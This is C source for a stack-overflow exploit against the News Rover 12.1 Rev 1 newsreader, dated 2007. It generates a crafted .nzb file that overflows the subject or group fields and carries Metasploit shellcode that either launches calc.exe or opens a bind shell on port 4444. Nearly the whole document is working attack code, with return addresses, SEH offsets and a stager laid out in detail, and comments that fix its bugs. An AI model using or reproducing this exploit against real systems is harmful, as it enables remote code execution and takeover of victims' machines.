
# Title : News Rover 12.1 Rev 1 Remote Stack Overflow Exploit
# Published : 2007-02-20
# Author : Marsu


/*********************************************************************************************
*                                                                                             *
*                    News Rover 12.1 Rev 1 Remote Stack Overflow exploit                      *
*                 Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr>                  *
*                                                                                             *
*             Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P              *
*********************************************************************************************/

#include "stdlib.h"
#include "stdio.h"
#include "string.h"


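/* win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/* BAD CHARS ARE 0x00 0x3c 0x3d 0x3e 0x3f 0x0a 0x0d 0x22 0x25 0x26 0xA7 0x8a. Maybe more... */
/*
 * The generator measures this buffer with strlen(), so it must not contain
 * 0x00 (it does not: 0x00 is in the bad-char list above).  Escapes are
 * "\x.." byte escapes; the listing had lost its backslashes, which would
 * have emitted the ASCII text "x2bxc9..." instead of machine code.
 */
char calcshellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\xb2\x82\x70\x83\xeb\xfc\xe2\xf4\x58\x5a\xc6\x70\xa4\xb2\x09\x35"
"\x98\x39\xfe\x75\xdc\xb3\x6d\xfb\xeb\xaa\x09\x2f\x84\xb3\x69\x39"
"\x2f\x86\x09\x71\x4a\x83\x42\xe9\x08\x36\x42\x04\xa3\x73\x48\x7d"
"\xa5\x70\x69\x84\x9f\xe6\xa6\x74\xd1\x57\x09\x2f\x80\xb3\x69\x16"
"\x2f\xbe\xc9\xfb\xfb\xae\x83\x9b\x2f\xae\x09\x71\x4f\x3b\xde\x54"
"\xa0\x71\xb3\xb0\xc0\x39\xc2\x40\x21\x72\xfa\x7c\x2f\xf2\x8e\xfb"
"\xd4\xae\x2f\xfb\xcc\xba\x69\x79\x2f\x32\x32\x70\xa4\xb2\x09\x18"
"\x98\xed\xb3\x86\xc4\xe4\x0b\x88\x27\x72\xf9\x20\xcc\x42\x08\x74"
"\xfb\xda\x1a\x8e\x2e\xbc\xd5\x8f\x43\xd1\xe3\x1c\xc7\x9c\xe7\x08"
"\xc1\xb2\x82\x70";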
 
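/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
/*
 * Same encoder and bad-char constraints as calcshellcode; also measured
 * with strlen() by the generator, so it must stay NUL-free.
 */
char bindshellcode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";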




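/*
 * Prologue of the generated .nzb.  Inner quotes and newlines are escaped
 * (the listing had lost the backslashes, which does not compile).  The
 * xmlns value is kept as the author wrote it; it is not a real NZB namespace.
 */
char nzbheader[] = "<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n"
                   "<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n"
                   "<!-- NZB Generated by MarsupilamiPowa -->\n"
                   "<nzb xmlns=\"http://www.google.com\">\n\n";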


char nzbend[]="</segment>n"
"</segments>n"
"</file>n"
"</nzb>n";

/* Default output name.  Not referenced by main() in this listing: the
   output path is always taken from argv[3]. */
char defaultfilename[] = "file" ".nzb";

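/*
 * Payload layout.  Offsets are the original author's; the two absolute
 * addresses were found on the author's XP SP2 FR box (see the comments
 * next to them) and must be re-derived for any other target.
 */
enum {
    /* type 0: subject="..." overflow, SEH overwrite */
    SUBJ_NSEH_OFF  = 2022,   /* next-SEH slot: jmp short +0x15 */
    SUBJ_SEH_OFF   = 2026,   /* handler slot: pop/pop/ret address */
    SUBJ_NOP_OFF   = 2030,   /* 15-byte NOP sled */
    SUBJ_SHELL_OFF = 2045,   /* jmp target; shellcode starts here */

    /* type 1: <group> overflow, return-address overwrite */
    GROUP_PAD_LEN  = 98,     /* bytes emitted as the group name */
    GROUP_STUB_LEN = 17,     /* stager at the start of the group name */
    GROUP_RET_OFF  = 94,     /* return-address slot */
    SEG_PAD_LEN    = 3000,   /* bytes emitted as the segment name */
    SEG_SHELL_OFF  = 1500    /* shellcode position inside the segment name */
};

/* Write exactly len bytes; 0 on success, -1 on a short write. */
static int write_bytes(FILE *out, const void *buf, size_t len)
{
    return fwrite(buf, 1, len, out) == len ? 0 : -1;
}

/* Write a NUL-terminated string literally (never as a format string). */
static int write_str(FILE *out, const char *s)
{
    return fputs(s, out) == EOF ? -1 : 0;
}

/*
 * Type 0: overflow in the <file subject="..."> attribute.
 * Layout of the attribute value:
 *   [0, 2022)   'A' filler
 *   2022        EB 15 90 90  -- next-SEH: jmp short +0x15, lands on 2045
 *   2026        2A 02 FC 7F  -- SEH handler 0x7FFC022A, pop/pop/ret
 *   2030        15 x NOP
 *   2045        shellcode (strlen(shell) bytes)
 * Only these bytes are emitted; the original padded to 3000 but cut the
 * string with a NUL right after the shellcode.
 * Returns 0 on success, -1 on allocation or write failure.
 */
static int emit_subject_overflow(FILE *out, const char *shell)
{
    size_t shell_len = strlen(shell);
    size_t pad_len = SUBJ_SHELL_OFF + shell_len;
    unsigned char *pad = malloc(pad_len);
    int rc = -1;

    if (pad == NULL)
        return -1;

    memset(pad, 'A', pad_len);
    /* EB 15 = jmp short +0x15: from 2024 to 2045, over the handler slot. */
    memcpy(pad + SUBJ_NSEH_OFF, "\xeb\x15\x90\x90", 4);
    /* 0x7FFC022A: a pop/pop/ret the author used to get past the SP2 SEH
       handler checks.  Only known to work on XP SP2 FR; inspect the target
       process and replace it if it does not. */
    memcpy(pad + SUBJ_SEH_OFF, "\x2a\x02\xfc\x7f", 4);
    memset(pad + SUBJ_NOP_OFF, 0x90, SUBJ_SHELL_OFF - SUBJ_NOP_OFF);
    memcpy(pad + SUBJ_SHELL_OFF, shell, shell_len);

    if (write_str(out, nzbheader) ||
        write_str(out, "<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"") ||
        write_bytes(out, pad, pad_len) ||
        write_str(out, "\">\n<groups><group>some group</group></groups>\n"
                       "<segments>\n<segment bytes=\"30\" number=\"1\">some name") ||
        write_str(out, nzbend))
        goto out;
    rc = 0;
out:
    free(pad);
    return rc;
}

/*
 * Type 1: overflow in a <group> element.  The group value is too short for
 * the shellcode, so it carries only a 17-byte stager plus a return address;
 * the shellcode itself is placed inside a 3000-byte segment name in the same
 * file, which per the author's note is what the stager reaches.
 * Stager: nop ; mov eax,0x33333333 ; sub eax,0x33332713 (eax=0x620) ;
 *         mov eax,[esp+eax] ; inc eax ; call eax
 * Returns 0 on success, -1 if the shellcode does not fit or on failure.
 */
static int emit_group_overflow(FILE *out, const char *shell)
{
    static const unsigned char stub[GROUP_STUB_LEN + 1] =
        "\x90\xb8\x33\x33\x33\x33\x2d\x13\x27\x33\x33\x8b\x04\x04\x40\xff\xd0";
    unsigned char group[GROUP_PAD_LEN];
    unsigned char *segment;
    size_t shell_len = strlen(shell);
    int rc = -1;

    /* The original copied the shellcode at a fixed offset into a 3000-byte
       buffer without checking it fits. */
    if (shell_len > (size_t)(SEG_PAD_LEN - SEG_SHELL_OFF))
        return -1;

    memset(group, 'A', sizeof group);
    memcpy(group, stub, GROUP_STUB_LEN);
    /* 0x77D1F153: "call ebx" in USER32.dll on the author's XP SP2 FR box.
       The original terminated the value with a NUL at offset 98, so exactly
       98 bytes are emitted. */
    memcpy(group + GROUP_RET_OFF, "\x53\xf1\xd1\x77", 4);

    /* Original realloc'd to 3000 bytes and then wrote the NUL at [3000]:
       a one-byte heap overflow in the generator.  An explicit length
       avoids the terminator altogether. */
    segment = malloc(SEG_PAD_LEN);
    if (segment == NULL)
        return -1;
    memset(segment, 'A', SEG_PAD_LEN);
    memcpy(segment + SEG_SHELL_OFF, shell, shell_len);

    if (write_str(out, nzbheader) ||
        write_str(out, "<file poster=\"Poster\" date=\"1170609233\" subject=\"Some Subj\">\n") ||
        write_str(out, "<groups><group>alt.bdffs</group></groups>\n<segments>\n"
                       "<segment bytes=\"30\" number=\"1\">no matter the name</segment>\n"
                       "</segments>\n</file>") ||
        write_str(out, "\n\n<file poster=\"Poster\" date=\"1170609233\" subject=\"Some Subj\">\n") ||
        write_str(out, "<groups><group>") ||
        write_bytes(out, group, sizeof group) ||
        write_str(out, "</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">") ||
        write_bytes(out, segment, SEG_PAD_LEN) ||
        write_str(out, nzbend))
        goto out;
    rc = 0;
out:
    free(segment);
    return rc;
}

static void usage(const char *prog)
{
    printf("[+] Usage: %s type mode file.nzb\n\n", prog);
    printf("[+] type is ...\n");
    printf("0: News Rover v12.1,  Rev. 1 Subject stack overflow. Works on XP SP2 FR\n");
    printf("1: News Rover v12.1,  Rev. 1 Group stack overflow. Works on XP SP2 FR\n\n");
    printf("[+] mode is \n");
    printf("0: Spawns calc.exe\n");
    printf("1: Binds to 4444\n\n");
    printf("[+] Ex: %s 0 0 file.nzb\n", prog);
}

/* Parse a whole decimal integer into *val; -1 if empty or trailing junk. */
static int parse_long(const char *s, long *val)
{
    char *end;

    if (s == NULL || *s == '\0')
        return -1;
    *val = strtol(s, &end, 10);
    return *end == '\0' ? 0 : -1;
}

/*
 * Usage: prog type mode file.nzb
 *   type  0 = subject overflow, 1 = group overflow (anything else: usage)
 *   mode  0 = calc.exe payload, any other value = bind shell on 4444
 * Writes the crafted .nzb to argv[3].  Exit status 0 on success, 1 on a
 * bad invocation or I/O failure.
 */
int main(int argc, char *argv[])
{
    long type = 0, mode = 0;
    const char *filename;
    const char *shell;
    FILE *out;
    int rc;

    printf("[+] NZB exploit for News Rover\n");
    printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");

    if (argc < 4 || parse_long(argv[1], &type) != 0 ||
        parse_long(argv[2], &mode) != 0 || (type != 0 && type != 1)) {
        usage(argv[0]);
        return 1;
    }
    filename = argv[3];
    /* Same selection as the original: only mode 0 picks calc. */
    shell = (mode == 0) ? calcshellcode : bindshellcode;

    out = fopen(filename, "wb");
    if (out == NULL) {
        perror(filename);
        return 1;
    }

    rc = (type == 0) ? emit_subject_overflow(out, shell)
                     : emit_group_overflow(out, shell);
    /* fclose() flushes; a failure here means the file is incomplete. */
    if (fclose(out) == EOF)
        rc = -1;
    if (rc != 0) {
        fprintf(stderr, "[-] Could not write %s\n", filename);
        return 1;
    }

    printf("[+] File generated! Have fun\n");
    return 0;
}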
